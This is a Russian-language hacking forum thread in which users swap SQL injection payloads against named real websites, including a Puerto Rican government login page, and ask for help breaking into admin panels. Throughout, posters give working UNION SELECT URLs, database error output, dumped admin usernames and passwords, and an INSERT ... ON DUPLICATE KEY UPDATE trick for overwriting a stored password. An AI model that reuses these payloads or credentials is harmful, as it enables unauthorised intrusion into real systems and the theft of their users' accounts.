Ваши вопросы по уязвимостям.

может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом

 

получается путь пральный !
видимо нет прав на запись ...или я не даже не знаю .. идеи ?

Да вы батенька - хам
Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем

 

Да

Закончить флудить и как уже сказали искать папку на запись

 

apekoff, на тебе диру под запись:

гугл всемогущий...или брюс. Похрен впрочем. Лейся.

 

парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpassword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin

но опять ничего не подошло, посмотрите плиз)

 

Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

Возможно таблица юзеров от чего то другого

 

wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)

 

На этом сайте есть таблица user

http://www.pcci.org.za/default.asp?id=946

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id = 946''.

/default.asp, line 128


http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2

http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'






Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/default.asp, line 128




Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.

 

FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MSysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATORS

 

ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)

 

Thanks, все получилось.

 

http://login.main.cne.gov.pr/login.php
есть следующие пары:
adminyn@mic
webmaster:2624

Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам!

 

Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.

 

Ну если есть инъекция в INSERT/DELETE запросе - то можно.

 

а если в SELECT-е -- нет?

 

Пример внедрения в студию

 

Скуль в имени таблицы:

 

А если mysql-inj будет в параметрах? (так то если mysql-inj в имени таблицы то это легко крутить)(именно интересует выход за таблицу и запись в другую какую либо таблицу (но скорее всего это не возможно ))

 

ты забыл добавить одно НО, если у пользователя из под которого работает скрипт ЕСТЬ ПРАВА НА ВЫПОЛНЕНИЕ операторов INSERT/UPDATE/DELETE.

Хотя да, я невнимательно прочитал твоё сообщение. Извиняюсь.

 

например:
INSERT INTO users
SET id ={inj}

INSERT INTO users
SET id =1 ON duplicate KEY UPDATE pass = '12345'

поле id должно быть первичным ключем или просто уникальным